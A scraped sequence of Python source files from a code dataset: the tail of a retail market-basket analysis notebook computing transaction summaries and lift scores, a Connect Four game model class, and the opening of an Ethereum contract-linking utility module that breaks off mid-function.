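                   "amt": [24.0, 26.0, 9.0], "units": [2, 2, 3]})
df["price"] = df["amt"] / df["units"]             # per-unit price per row
avg = df.groupby("product_comb")["price"].mean()  # mean price per product
under_10 = set(avg[avg < 10].index)
assert under_10 == {"200-002"}  # 100-001 averages 12.5, 200-002 averages 3.0
```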
Row_RawData:\",data_NonRewards.shape)\nprint(\"Non_Rewards - Unique_id:\", len(data_NonRewards['customer_id_hashed'].unique()))\n# data=data[(data['subclass_transaction_amt']>0) & (data['subclass_transaction_units']>0)] #Already filtered at the beginning\n\ngc.collect()\n\n\n# In[12]:\n\ndef count_unique(x):\n return len(set(x))\n\n\n# # Get the count of actual transactions\n\n# In[13]:\n\nRewards_transactions_list=data_Rewards.groupby(['location_id','transaction_dt','transaction_id','customer_id_hashed'])['product_comb'].apply(list).to_frame().reset_index().rename(columns={\"product_comb\":\"basket_list\"})\nRewards_transactions_units_sales=data_Rewards.groupby(['location_id','transaction_dt','transaction_id','customer_id_hashed'])['subclass_transaction_units','subclass_transaction_amt'].sum().reset_index().rename(columns={\"subclass_transaction_units\":\"total_item_units\",\"subclass_transaction_amt\":\"total_item_revenue\"})\nRewards_transactions=pd.merge(Rewards_transactions_list,Rewards_transactions_units_sales,on=['location_id','transaction_dt','transaction_id','customer_id_hashed'],how=\"left\")\nRewards_transactions['basket_str']=Rewards_transactions['basket_list'].apply(lambda x: sorted(x)).astype(str)\nRewards_transactions['transactin_id_given']=[x for x in range(1,len(Rewards_transactions)+1)]\nRewards_transactions['types']=Rewards_transactions['basket_list'].apply(lambda x: len(x))\n\n\n# In[14]:\n\nRewards_Trans_by_ID=Rewards_transactions.groupby(['customer_id_hashed'])['transactin_id_given'].count().to_frame().reset_index().rename(columns={\"transactin_id_given\":\"trans_count\"})\n\nRewards_IDCounts_by_Trans=Rewards_Trans_by_ID.groupby(['trans_count'])['customer_id_hashed'].count().to_frame().reset_index()\ndf_Rewards_IDCounts_by_Trans=Rewards_IDCounts_by_Trans.copy()\ndf_Rewards_IDCounts_by_Trans['trans_count']=np.where(df_Rewards_IDCounts_by_Trans['trans_count']>=3,\"3+\",df_Rewards_IDCounts_by_Trans['trans_count'])\ndf_Rewards_IDCounts_by_Trans['trans_count']=df_Rewards_IDCounts_by_Trans['trans_count'].replace(1,\"1\").replace(2,\"2\")\ndf_Rewards_IDCounts_by_Trans=df_Rewards_IDCounts_by_Trans.groupby(['trans_count'])['customer_id_hashed'].sum().to_frame().reset_index().rename(columns={\"customer_id_hashed\":\"ID_Counts\"})\ndf_Rewards_IDCounts_by_Trans['Label']=\"Rewards_ID\"\ndf_Rewards_IDCounts_by_Trans=df_Rewards_IDCounts_by_Trans[['Label','trans_count','ID_Counts']]\n\n\n# In[15]:\n\ndf_Non_Rewards_Trans_Count=data_NonRewards[['location_id','transaction_dt','transaction_id']].drop_duplicates()\n\ndf_output_1_count_by_trans_of_ids_price_10Plus=df_Rewards_IDCounts_by_Trans.append(pd.DataFrame({'Label':\"Non_Rewards_Trans\",'trans_count':\"1+\",'ID_Counts':len(df_Non_Rewards_Trans_Count)},index=[3]))\ndf_output_1_count_by_trans_of_ids_price_10Plus=df_output_1_count_by_trans_of_ids_price_10Plus[['Label','trans_count','ID_Counts']]\ndf_output_1_count_by_trans_of_ids_price_10Plus\n\n\n# 
In[16]:\n\nRewards_data_transactions_list=data_Rewards.groupby(['location_id','transaction_dt','transaction_id','customer_id_hashed'])['product_comb'].apply(list).to_frame().reset_index().rename(columns={\"product_comb\":\"basket_list\"})\nRewards_data_transactions_units_sales=data_Rewards.groupby(['location_id','transaction_dt','transaction_id','customer_id_hashed'])['subclass_transaction_units','subclass_transaction_amt'].sum().reset_index().rename(columns={\"subclass_transaction_units\":\"total_item_units\",\"subclass_transaction_amt\":\"total_item_revenue\"})\n\nRewards_data_transactions=pd.merge(Rewards_data_transactions_list,Rewards_data_transactions_units_sales,on=['location_id','transaction_dt','transaction_id','customer_id_hashed'],how=\"left\")\nRewards_data_transactions['basket_str']=Rewards_data_transactions['basket_list'].apply(lambda x: sorted(x)).astype(str)\nRewards_data_transactions['transactin_id_given']=[x for x in range(1,len(Rewards_data_transactions)+1)]\nRewards_data_transactions['types']=Rewards_data_transactions['basket_list'].apply(lambda x: len(x))\n\n# To save\n\n\nRewards_data_transactions=pd.merge(data_Rewards,Rewards_data_transactions,on=[\"location_id\",\"transaction_dt\",\"transaction_id\",\"customer_id_hashed\"],how=\"left\")\napply_func={\"subclass_transaction_units\":\"sum\",\"transactin_id_given\":\"count\",\"subclass_transaction_amt\":\"sum\"}\n\nsingle_prod_df=Rewards_data_transactions.groupby(['product_comb'])['subclass_transaction_units','transactin_id_given','subclass_transaction_amt'].agg(apply_func).reset_index().rename(columns={\"subclass_transaction_units\":\"Total_Units\",\"transactin_id_given\":\"Total_Trans\",\"subclass_transaction_amt\":\"revenue\"})\ntotal_unit=single_prod_df['Total_Units'].sum()\ntotal_trans=len(Rewards_data_transactions)\n\nsingle_prod_df['prob_unit']=single_prod_df['Total_Units']/total_unit\nsingle_prod_df['prob_tran']=single_prod_df['Total_Trans']/total_trans\n\ndict_single_prod_unit=single_prod_df.set_index(['product_comb'])['prob_unit'].to_dict()\ndict_single_prod_tran=single_prod_df.set_index(['product_comb'])['prob_tran'].to_dict()\n\n\n# In[17]:\n\nRewards_Trans_by_ID=Rewards_Trans_by_ID.rename(columns={\"trans_count\":\"trans_count_by_id\"})\nRewards_data_transactions=pd.merge(Rewards_data_transactions,Rewards_Trans_by_ID,on=\"customer_id_hashed\",how=\"left\")\nRewards_data_transactions['trans_count_by_id']=np.where(Rewards_data_transactions['trans_count_by_id']>=3,\"3+\",Rewards_data_transactions['trans_count_by_id'])\nRewards_data_transactions['trans_count_by_id']=Rewards_data_transactions['trans_count_by_id'].replace(1,\"1\").replace(2,\"2\")\n\n\n# 
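The `1 / 2 / 3+` trip buckets built in the cells around here hinge on `numpy.where` collapsing every count of three or more into one label while the rest are kept as strings; a toy check of that move:

```python
import numpy as np
import pandas as pd

trips = pd.Series([1, 2, 5, 3, 1])
bucket = np.where(trips >= 3, "3+", trips.astype(str))
assert list(bucket) == ["1", "2", "3+", "3+", "1"]
```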
In[19]:\n\ndf_output_2_1_count_by_trans_of_ids_price_10Plus=Rewards_data_transactions.groupby(['trans_count_by_id','types'])['transactin_id_given'].apply(count_unique).reset_index().rename(columns={\"transactin_id_given\":\"Transaction_Count\"})\ndf_output_2_1_count_by_trans_of_ids_price_10Plus_actual=df_output_2_1_count_by_trans_of_ids_price_10Plus.copy()\ndf_output_2_1_count_by_trans_of_ids_price_10Plus['types']=np.where(df_output_2_1_count_by_trans_of_ids_price_10Plus['types']>=6,\"6+\",df_output_2_1_count_by_trans_of_ids_price_10Plus['types'])\n\ndf_output_2_1_count_by_trans_of_ids_price_10Plus=df_output_2_1_count_by_trans_of_ids_price_10Plus.groupby(['trans_count_by_id','types'])['Transaction_Count'].sum().reset_index()\ndf_output_2_1_count_by_trans_of_ids_price_10Plus=df_output_2_1_count_by_trans_of_ids_price_10Plus.pivot_table(index=\"types\",columns=\"trans_count_by_id\",values=\"Transaction_Count\").reset_index().rename(columns={\"types\":\"item_types\"})\n\ndf_output_2_1_count_by_trans_of_ids_price_10Plus=df_output_2_1_count_by_trans_of_ids_price_10Plus.sort_values(\"item_types\")\ndf_output_2_1_count_by_trans_of_ids_price_10Plus['Label']=\"Rewards\"\ndf_output_2_1_count_by_trans_of_ids_price_10Plus\n\n\n# In[20]:\n\ndf_output_2_2_count_by_trans_of_ids_price_10Plus=data_NonRewards.groupby(['location_id','transaction_dt','transaction_id'])['product_comb'].apply(list).reset_index()\ndf_output_2_2_count_by_trans_of_ids_price_10Plus['item_types']=df_output_2_2_count_by_trans_of_ids_price_10Plus['product_comb'].apply(len)\ndf_output_2_2_count_by_trans_of_ids_price_10Plus_actual=df_output_2_2_count_by_trans_of_ids_price_10Plus.groupby(['item_types'])['transaction_id'].count().to_frame().reset_index()\ndf_output_2_2_count_by_trans_of_ids_price_10Plus=df_output_2_2_count_by_trans_of_ids_price_10Plus_actual.copy()\ndf_output_2_2_count_by_trans_of_ids_price_10Plus['item_types']=np.where(df_output_2_2_count_by_trans_of_ids_price_10Plus['item_types']>=6,\"6+\",df_output_2_2_count_by_trans_of_ids_price_10Plus['item_types'])\ndf_output_2_2_count_by_trans_of_ids_price_10Plus=df_output_2_2_count_by_trans_of_ids_price_10Plus.groupby(['item_types'])['transaction_id'].sum().to_frame().reset_index().rename(columns={\"transaction_id\":\"Transaction_Count\"})\ndf_output_2_2_count_by_trans_of_ids_price_10Plus['Label']=\"Non_Rewards\"\ndf_output_2_2_count_by_trans_of_ids_price_10Plus\n\n\n# 
In[21]:\n\ndata['customer_id_hashed']=data['customer_id_hashed'].fillna(\"nan\")\ndf_output_3_count_by_trans_of_ids_price_10Plus=data.groupby(['location_id','transaction_dt','transaction_id','customer_id_hashed'])['product_comb'].apply(list).reset_index()\ndf_output_3_count_by_trans_of_ids_price_10Plus['item_types']=df_output_3_count_by_trans_of_ids_price_10Plus['product_comb'].apply(len)\ndf_output_3_count_by_trans_of_ids_price_10Plus_actual=df_output_3_count_by_trans_of_ids_price_10Plus.groupby(['item_types'])['transaction_id'].count().to_frame().reset_index()\ndf_output_3_count_by_trans_of_ids_price_10Plus=df_output_3_count_by_trans_of_ids_price_10Plus_actual.copy()\ndf_output_3_count_by_trans_of_ids_price_10Plus['item_types']=np.where(df_output_3_count_by_trans_of_ids_price_10Plus['item_types']>=6,\"6+\",df_output_3_count_by_trans_of_ids_price_10Plus['item_types'])\ndf_output_3_count_by_trans_of_ids_price_10Plus=df_output_3_count_by_trans_of_ids_price_10Plus.groupby(['item_types'])['transaction_id'].sum().to_frame().reset_index().rename(columns={\"transaction_id\":\"Transaction_Count\"})\ndf_output_3_count_by_trans_of_ids_price_10Plus['Label']=\"Rewards_and_NonRewards\"\ndf_output_3_count_by_trans_of_ids_price_10Plus\n\n\n# In[22]:\n\nwriter=pd.ExcelWriter(output_folder+\"BL_Transaction_Summary_JL_\"+str(datetime.datetime.now().date())+\".xlsx\",engine=\"xlsxwriter\")\ndf_output_1_count_by_trans_of_ids_price_10Plus.to_excel(writer,\"summary_1_transactions_ids\")\ndf_output_2_1_count_by_trans_of_ids_price_10Plus.to_excel(writer,\"summary_2_1_Rewards_trans_items\")\ndf_output_2_2_count_by_trans_of_ids_price_10Plus.to_excel(writer,\"summary_2_2_NonRew_trans_items\")\ndf_output_3_count_by_trans_of_ids_price_10Plus.to_excel(writer,\"summary_3_all_transactions\")\nwriter.save()\n\ndel data\ngc.collect()\n\n\n# # Calcuating BAI\n\n# In[23]:\n\nunique_id_df=Rewards_data_transactions.groupby(['product_comb'])['customer_id_hashed'].apply(count_unique).to_frame().reset_index().rename(columns={\"customer_id_hashed\":\"unique_ids\"})\nsingle_prod_df=pd.merge(single_prod_df,unique_id_df,on=\"product_comb\")\n\n\n# In[24]:\n\ndata_basket=Rewards_data_transactions.groupby(['basket_str'])['total_item_units','total_item_revenue','transactin_id_given'].agg(\n {\"total_item_units\":\"sum\",\"total_item_revenue\":\"sum\",\"transactin_id_given\":\"count\"}).reset_index().rename(columns={\"transactin_id_given\":\"trans_count\"})\ndata_basket['basket_list']=data_basket['basket_str'].apply(eval)\ndata_basket['item_types']=data_basket['basket_list'].apply(len)\ndata_basket=data_basket.sort_values(['item_types','basket_str'])\n\ndata_basket=data_basket.reset_index()\ndel data_basket['index']\n\nunique_id_by_basket=Rewards_data_transactions.groupby(['basket_str'])['customer_id_hashed'].apply(lambda x: len(set(x))).to_frame().reset_index().rename(columns={'customer_id_hashed':\"unique_ids\"})\ndata_basket=pd.merge(data_basket,unique_id_by_basket,on=\"basket_str\",how=\"left\")\n\n\n# In[25]:\n\n# data_basket.to_csv(\"/home/jian/Projects/Big_Lots/Analysis/2018_Q4/Product_Basket/data_for_freq_dist_JL_\"+str(datetime.datetime.now().date())+\".csv\",index=False)\n\n\n# In[26]:\n\nfrom itertools import combinations\ndef findsubsets(total_set,item_counts):\n return list(set(combinations(total_set, item_counts)))\n\nfor i in range(2,6):\n locals()['set_'+str(i)+\"_comb\"]=[]\n output_1_basket_str_list_i=sorted(data_basket[data_basket['item_types']==i]['basket_str'].unique().tolist())\n 
output_2_basket_str_list_i_plus=[]\n basket_str_list_i_plus=data_basket[data_basket['item_types']>i]['basket_str'].unique().tolist()\n \n \n for set_str in basket_str_list_i_plus:\n set_list=eval(set_str)\n output_2_basket_str_list_i_plus=list(set(output_2_basket_str_list_i_plus+[str(list(x)) for x in findsubsets(set_list,i)]))\n \n locals()['set_'+str(i)+\"_comb\"]=sorted(list(set(output_1_basket_str_list_i+output_2_basket_str_list_i_plus)))\n print(i, datetime.datetime.now())\n print(len(locals()['set_'+str(i)+\"_comb\"]))\n \n\n\n# In[27]:\n\n'''\nbasket_transaction_2_plus=data_basket[data_basket['item_types']>=2][['basket_str','trans_count']]\nbasket_transaction_3_plus=data_basket[data_basket['item_types']>=3][['basket_str','trans_count']]\nbasket_transaction_4_plus=data_basket[data_basket['item_types']>=4][['basket_str','trans_count']]\nbasket_transaction_5_plus=data_basket[data_basket['item_types']>=5][['basket_str','trans_count']]\n'''\n\n\n# In[28]:\n\nlist_set_all=set_2_comb+set_3_comb+set_4_comb+set_5_comb\ntotal_len=len(list_set_all)\ntotal_len\n\n\n# In[30]:\n\nprocessors=25\n\ninterval=int(np.floor(total_len/processors))\n# list_set_all_subset_0=list_set_all_subset_[:interval]\n# 0 to 9, 10 in total\nall_list_of_input=[]\nfor i in range(processors-1): \n #1 to 9\n locals()['list_set_all_subset_'+str(i)]=list_set_all[interval*i:interval*(i+1)]\n all_list_of_input=all_list_of_input+[locals()['list_set_all_subset_'+str(i)]]\nlocals()['list_set_all_subset_'+str(processors-1)]=list_set_all[interval*(processors-1):]\nall_list_of_input=all_list_of_input+[locals()['list_set_all_subset_'+str(processors-1)]]\n\n\n# In[32]:\n\ndef getting_BAI_items(list_set_subset_i):\n i_counter=0\n dict_basket_support_trans={}\n dict_basket_support_items={}\n dict_basket_BAI_trans={}\n dict_basket_BAI_items={}\n dict_basket_unique_ids={}\n dict_basket_revenue={} #revenue only for the selected subset of items\n for basket_n in list_set_subset_i:\n basket_n_list=eval(basket_n)\n len_items=len(basket_n_list)\n \n df=Rewards_data_transactions[Rewards_data_transactions['product_comb'].isin(basket_n_list)][['basket_str','transactin_id_given','subclass_transaction_units','customer_id_hashed','subclass_transaction_amt']]\n \n trans_denominator=1\n items_denominator=1\n \n for k in range(len_items):\n globals()['basket_item_'+str(k)]=basket_n_list[k]\n df=df[df['basket_str'].apply(lambda x: globals()['basket_item_'+str(k)] in x)]\n trans_denominator=trans_denominator*dict_single_prod_tran[globals()['basket_item_'+str(k)]]\n items_denominator=items_denominator*dict_single_prod_unit[globals()['basket_item_'+str(k)]]\n\n trans_basket=len(df['transactin_id_given'].unique())\n items_basket=df['subclass_transaction_units'].sum()\n unique_ids_basket=len(df['customer_id_hashed'].unique())\n revenue_bakset=df['subclass_transaction_amt'].sum()\n \n dict_basket_support_trans.update({basket_n:trans_basket})\n dict_basket_support_items.update({basket_n:items_basket})\n dict_basket_unique_ids.update({basket_n:unique_ids_basket})\n dict_basket_revenue.update({basket_n:revenue_bakset})\n\n BAI_basket_trans=(trans_basket/total_trans)/trans_denominator*100\n BAI_basket_items=(items_basket/total_unit)/items_denominator*100\n \n dict_basket_BAI_trans.update({basket_n:BAI_basket_trans})\n dict_basket_BAI_items.update({basket_n:BAI_basket_items})\n \n i_counter+=1\n if i_counter%1000==10:\n logging.info(str(datetime.datetime.now())+\"|\"+str(i_counter))\n results_json={}\n 
results_json.update({\"dict_basket_support_trans\":dict_basket_support_trans})\n results_json.update({\"dict_basket_support_items\":dict_basket_support_items})\n results_json.update({\"dict_basket_BAI_trans\":dict_basket_BAI_trans})\n results_json.update({\"dict_basket_BAI_items\":dict_basket_BAI_items})\n results_json.update({\"dict_basket_unique_ids\":dict_basket_unique_ids})\n results_json.update({\"dict_basket_revenue\":dict_basket_revenue})\n \n return results_json\n\n\n# In[33]:\n\nfrom multiprocessing import Pool\n\nresult_dict_basket_support_trans={}\nresult_dict_basket_support_items={}\nresult_dict_basket_BAI_trans={}\nresult_dict_basket_BAI_items={}\nresult_dict_basket_unique_ids={}\nresult_dict_basket_revenue={}\n\nif __name__ == '__main__':\n p = Pool(processors)\n result=p.map(getting_BAI_items, all_list_of_input)\n for res in result:\n if res is not None:\n result_dict_basket_support_trans.update(res[\"dict_basket_support_trans\"])\n result_dict_basket_support_items.update(res[\"dict_basket_support_items\"])\n result_dict_basket_BAI_trans.update(res[\"dict_basket_BAI_trans\"])\n result_dict_basket_BAI_items.update(res[\"dict_basket_BAI_items\"])\n result_dict_basket_unique_ids.update(res['dict_basket_unique_ids'])\n result_dict_basket_revenue.update(res['dict_basket_revenue'])\n p.close()\n p.join()\n \n\n\n# In[35]:\n\noutput_1=data_basket[data_basket['item_types']==1]\noutput_2=data_basket[data_basket['item_types'].isin([2,3,4,5])]\noutput_3=data_basket[data_basket['item_types']>5]\n\noutput_1['BAI_trans']=100\noutput_1['BAI_items']=100\n\noutput_2['BAI_trans']=output_2['basket_str'].apply(lambda x: result_dict_basket_BAI_trans[x])\noutput_2['BAI_items']=output_2['basket_str'].apply(lambda x: result_dict_basket_BAI_items[x])\n\noutput_basket=output_1.append(output_2).append(output_3) # To add those only in multiple item trans\n#E.g. 
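`getting_BAI_items` above computes what is conventionally called lift, scaled by 100: the observed share of transactions containing the whole item set, divided by the product of the individual items' shares. A dependency-free sketch of the formula (invented counts):

```python
def bai(joint_count, total, item_shares):
    expected = 1.0
    for share in item_shares:          # independence baseline
        expected *= share
    return (joint_count / total) / expected * 100

# 30 of 1000 baskets hold both items; each item alone is in 20% of baskets.
assert round(bai(30, 1000, [0.2, 0.2]), 1) == 75.0  # under 100: rarer than chance
```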
[a,b,c,d] [a,c] doesn't exsit\n\n\n# In[37]:\n\nsingle_prod_df['BAI_Trans']=100\nsingle_prod_df['BAI_Items']=100\n\n\n# In[38]:\n\ndf1=pd.DataFrame(result_dict_basket_support_trans,index=['Total_Trans']).T.reset_index().rename(columns={\"index\":\"basket_str\"})\ndf2=pd.DataFrame(result_dict_basket_support_items,index=['Total_Units']).T.reset_index().rename(columns={\"index\":\"basket_str\"})\ndf3=pd.DataFrame(result_dict_basket_BAI_trans,index=['BAI_Trans']).T.reset_index().rename(columns={\"index\":\"basket_str\"})\ndf4=pd.DataFrame(result_dict_basket_BAI_items,index=['BAI_Items']).T.reset_index().rename(columns={\"index\":\"basket_str\"})\ndf5=pd.DataFrame(result_dict_basket_unique_ids,index=['unique_ids']).T.reset_index().rename(columns={\"index\":\"basket_str\"})\ndf6=pd.DataFrame(result_dict_basket_revenue,index=['revenue']).T.reset_index().rename(columns={\"index\":\"basket_str\"})\n\noutput_all_2345_available=pd.merge(df1,df2,on='basket_str')\noutput_all_2345_available=pd.merge(df3,output_all_2345_available,on='basket_str')\noutput_all_2345_available=pd.merge(df4,output_all_2345_available,on='basket_str')\noutput_all_2345_available=pd.merge(df5,output_all_2345_available,on='basket_str')\noutput_all_2345_available=pd.merge(df6,output_all_2345_available,on='basket_str')\n\n\n# In[40]:\n\nsingle_prod_df['basket_str']=\"['\"+single_prod_df['product_comb']+\"']\"\ndel single_prod_df['product_comb']\n\noutput_all_12345_available=single_prod_df.append(output_all_2345_available)\noutput_all_12345_available['basket_list']=output_all_12345_available['basket_str'].apply(eval)\noutput_all_12345_available['item_types']=output_all_12345_available['basket_list'].apply(len)\noutput_all_12345_available=output_all_12345_available.sort_values('item_types',ascending=True)\n\n# All posibble from the shopped large basket 1-5\noutput_3=data_basket[data_basket['item_types']>5]\noutput_3=output_3.rename(columns={\"trans_count\":\"Total_Trans\",\"total_item_units\":\"Total_Units\",\"total_item_revenue\":\"revenue\"})\n\noutput_all_12345_available=output_all_12345_available.append(output_3) #Appended >5\n\n\n# # Step 2\n\n# In[49]:\n\n# Apply the BAI of items to the baskets\n\nlen(result_dict_basket_BAI_items)\ndata_item_avg_price_dict=data_item_avg_price.set_index([\"product_comb\"]).to_dict()['avg_price']\nlen(data_item_avg_price_dict)\n\n\n# In[51]:\n\n'''\ndef brewak_basket_to_top_5(input_x):\n input_x=eval(input_x)\n len_input_x=len(input_x)\n df=pd.DataFrame({\"subcalss_item\":input_x},index=range(len(len_input_x)))\n df['price']=df['subcalss_item'].apply(lambda x: data_item_avg_price_dict[x])\n df=df.sort_values(\"price\",ascending=False).head(5)\n \n chapion_subclass=df['subcalss_item'].tolist()[0]\n df['class_code_id']=df['subcalss_item'].apply(lambda x: x.split({\"-\"}[0]))\n chapion_subclass_id=df['class_code_id'].tolist(0)\n \n complementary_subclass_df=df[df['class_code_id']==chapion_class_id]\n \n if len(complementary_subclass_df)>0:\n complementary_subclass_df_1=complementary_subclass_df.head(3)\n complementary_subclass_df_2=\n'''\n\n\n# In[26]:\n\n'''\nwriter=pd.ExcelWriter(output_folder+\"/BL_DBasket_Version2_JL_'+str(datetime.datetime.now().date())+\".xlsx\",engine=\"xlsxwriter\")\n# 
output=output[['basket_str','basket_list','BAI_trans','BAI_units','item_types','total_item_revenue','total_item_units','trans_count','unique_ids','price_list']]\noutput_all_12345_available=output_all_12345_available[['basket_list','BAI_Trans','BAI_Items','item_types','revenue','Total_Units','Total_Trans','unique_ids']]\noutput_all_12345_available=output_all_12345_available.sort_values(['item_types','BAI_Trans'],ascending=[True,False])\noutput_all_12345_available.to_excel(writer,\"BAI_including_subsets\",index=False)\ndata_basket.to_excel(writer,\"basket_shopped_together\",index=False)\nwriter.save()\n'''\nlogging.info(\"Done: \"+str(datetime.datetime.now()))\n\n\n# In[27]:\n\noutput_all_12345_available.to_csv(output_folder+\"/BL_DBasket_Version2_BAI_output_JL_\"+str(datetime.datetime.now().date())+\".csv\",index=False)\ndata_basket.to_csv(output_folder+\"/BL_DBasket_Version2_actual_whole_baskets_output_JL_\"+str(datetime.datetime.now().date())+\".csv\",index=False)\n\n\n\n# In[37]:\n\noutput_all_12345_available[output_all_12345_available['item_types']==1].to_csv(output_folder+\"/BL_DBasket_Version2_BAI_output_Item_1_JL_\"+str(datetime.datetime.now().date())+\".csv\",index=False)\noutput_all_12345_available[output_all_12345_available['item_types']==2].to_csv(output_folder+\"/BL_DBasket_Version2_BAI_output_Item_2_JL_\"+str(datetime.datetime.now().date())+\".csv\",index=False)\noutput_all_12345_available[output_all_12345_available['item_types']==3].to_csv(output_folder+\"/BL_DBasket_Version2_BAI_output_Item_3_JL_\"+str(datetime.datetime.now().date())+\".csv\",index=False)\noutput_all_12345_available[output_all_12345_available['item_types']==4].to_csv(output_folder+\"/BL_DBasket_Version2_BAI_output_Item_4_JL_\"+str(datetime.datetime.now().date())+\".csv\",index=False)\noutput_all_12345_available[output_all_12345_available['item_types']==5].to_csv(output_folder+\"/BL_DBasket_Version2_BAI_output_Item_5_JL_\"+str(datetime.datetime.now().date())+\".csv\",index=False)\noutput_all_12345_available[output_all_12345_available['item_types']>5].to_csv(output_folder+\"/BL_DBasket_Version2_BAI_output_Item_6Plus_JL_\"+str(datetime.datetime.now().date())+\".csv\",index=False)\n\n\n\n","sub_path":"code_back_up/backuped_on_sharefolder_2021-01-06_000/00486_PY_20190202.py","file_name":"00486_PY_20190202.py","file_ext":"py","file_size_in_byte":27212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"289312082","text":"from c4exceptions import IllegalMoveError\n\nPLAYER1 = 1\nPLAYER2 = 2\nEMPTY = -1\n\n\nclass ConnectFourModel:\n def __init__(self):\n self.__grid = None\n self.__turn = -1\n self.__grid_observers = []\n self.__result_observers = []\n\n def initialize(self):\n self.__grid = []\n for i in range(7):\n row = []\n for j in range(6):\n row.append(EMPTY)\n self.__grid.append(row)\n\n self.__turn = PLAYER1\n self.__notify_grid_observers()\n\n def set_grid_position(self, column, player):\n if column < 0 or column > 6:\n raise IllegalMoveError(column, player)\n\n row = 5\n while self.__grid[column][row] != EMPTY:\n row -= 1\n\n if row < 0:\n raise IllegalMoveError(column, player)\n\n self.__grid[column][row] = player\n self.__notify_grid_observers()\n\n result = self.check_for_winner()\n if result > 0:\n self.__notify_result_observers(result)\n elif self.check_for_draw():\n self.__notify_result_observers(0)\n\n return row\n\n def __notify_grid_observers(self):\n for o in self.__grid_observers:\n o.update_grid()\n\n def __notify_result_observers(self, 
result):\n for o in self.__result_observers:\n o.report_result(result)\n\n def check_for_winner(self):\n win = self.__check_horizontal_win()\n if win < 0:\n win = self.__check_vertical_win()\n if win < 0:\n win = self.__check_neg_diagonal_win()\n if win < 0:\n win = self.__check_pos_diagonal_win()\n\n return win\n\n def __check_horizontal_win(self):\n win = False\n for row in range(6):\n for col in range(4):\n if self.__grid[col][row] != EMPTY:\n win = (self.__grid[col][row] == self.__grid[col + 1][row]) and (\n self.__grid[col][row] == self.__grid[col + 2][row]) and (\n self.__grid[col][row] == self.__grid[col + 3][row])\n if win:\n return self.__grid[col][row]\n return -1\n\n def __check_vertical_win(self):\n win = False\n for col in range(7):\n for row in range(3):\n if self.__grid[col][row] != EMPTY:\n win = (self.__grid[col][row] == self.__grid[col][row + 1]) and (\n self.__grid[col][row] == self.__grid[col][row + 2]) and (\n self.__grid[col][row] == self.__grid[col][row + 3])\n if win:\n return self.__grid[col][row]\n return -1\n\n def __check_neg_diagonal_win(self):\n win = False\n for col in range(4):\n for row in range(3):\n if self.__grid[col][row] != EMPTY:\n win = (self.__grid[col][row] == self.__grid[col + 1][row + 1]) and (\n self.__grid[col][row] == self.__grid[col + 2][row + 2]) and (\n self.__grid[col][row] == self.__grid[col + 3][row + 3])\n if win:\n return self.__grid[col][row]\n return -1\n\n def __check_pos_diagonal_win(self):\n win = False\n for col in range(3, 7):\n for row in range(3):\n if self.__grid[col][row] != EMPTY:\n win = (self.__grid[col][row] == self.__grid[col - 1][row + 1]) and (\n self.__grid[col][row] == self.__grid[col - 2][row + 2]) and (\n self.__grid[col][row] == self.__grid[col - 3][row + 3])\n if win:\n return self.__grid[col][row]\n return -1\n\n def check_for_draw(self):\n for i in range(7):\n for j in range(6):\n if self.__grid[i][j] == EMPTY:\n return False\n return True\n\n def next_player(self):\n if self.__turn == PLAYER1:\n self.__turn = PLAYER2\n else:\n self.__turn = PLAYER1\n\n def get_turn(self):\n return self.__turn\n\n def get_grid(self):\n return self.__grid\n\n def get_valid_moves(self):\n return [(self.__grid[x][0] == EMPTY) for x in range(7)]\n\n def register_grid_observer(self, o):\n self.__grid_observers.append(o)\n\n def register_result_observer(self, o):\n self.__result_observers.append(o)\n\n def remove_grid_observer(self, o):\n try:\n self.__grid_observers.remove(o)\n except ValueError:\n pass\n\n def remove_result_observer(self, o):\n try:\n self.__result_observers.remove(o)\n except ValueError:\n pass\n","sub_path":"AIPrj2/AIProject 2 Instructions/python/c4model.py","file_name":"c4model.py","file_ext":"py","file_size_in_byte":4724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"452460422","text":"import itertools\nimport os\nimport json\nimport re\nimport functools\n\nimport toposort\n\nfrom web3.utils.formatting import (\n remove_0x_prefix,\n)\nfrom web3.utils.string import (\n coerce_args_to_text,\n)\n\nfrom populus.utils.functional import (\n compose,\n)\nfrom .filesystem import (\n get_compiled_contracts_file_path,\n)\n\n\ndef package_contracts(contract_classes):\n _dict = {\n '__len__': lambda s: len(contract_classes),\n '__iter__': lambda s: iter(contract_classes.items()),\n '__contains__': lambda s, k: contract_classes.__contains__(k),\n '__getitem__': lambda s, k: contract_classes.__getitem__(k),\n '__setitem__': lambda s, k, v: 
contract_classes.__setitem__(k, v),\n 'keys': lambda s: contract_classes.keys(),\n 'values': lambda s: contract_classes.values(),\n }\n _dict.update(contract_classes)\n\n return type('contracts', (object,), _dict)()\n\n\ndef construct_contract_factories(web3, contracts):\n constructor_kwargs = {\n contract_name: {\n 'code': contract_data.get('code'),\n 'code_runtime': contract_data.get('code_runtime'),\n 'abi': contract_data.get('abi'),\n 'source': contract_data.get('source'),\n 'address': contract_data.get('address'),\n } for contract_name, contract_data in contracts.items()\n }\n contract_classes = {\n name: web3.eth.contract(**contract_data)\n for name, contract_data in constructor_kwargs.items()\n }\n return package_contracts(contract_classes)\n\n\ndef load_compiled_contract_json(project_dir):\n compiled_contracts_path = get_compiled_contracts_file_path(project_dir)\n\n if not os.path.exists(compiled_contracts_path):\n raise ValueError(\"No compiled contracts found\")\n\n with open(compiled_contracts_path) as contracts_file:\n contracts = json.loads(contracts_file.read())\n\n return contracts\n\n\nDEPENDENCY_RE = re.compile((\n '__' # Prefixed by double underscore\n '(?P[a-zA-Z_](?:[a-zA-Z0-9_]{0,34}[a-zA-Z0-9])?)' # capture the name of the dependency\n '_{0,35}'\n '__' # End with a double underscore\n))\n\n\n@coerce_args_to_text\ndef find_link_references(bytecode):\n \"\"\"\n Given bytecode, this will return all of the unlinked references from within\n the bytecode.\n\n The returned names may be truncated to 36 characters.\n \"\"\"\n return set(DEPENDENCY_RE.findall(bytecode))\n\n\ndef make_link_regex(contract_name):\n \"\"\"\n Returns a regex that will match embedded link references within a\n contract's bytecode.\n \"\"\"\n return re.compile(\n contract_name[:36].ljust(38, \"_\").rjust(40, \"_\")\n )\n\n\ndef expand_shortened_reference_name(name, full_names):\n \"\"\"\n If a contract dependency has a name longer than 36 characters then the name\n is truncated in the compiled but unlinked bytecode. This maps a name to\n it's full name.\n \"\"\"\n if name in full_names:\n return name\n\n candidates = [\n n for n in full_names if n.startswith(name)\n ]\n if len(candidates) == 1:\n return candidates[0]\n elif len(candidates) > 1:\n 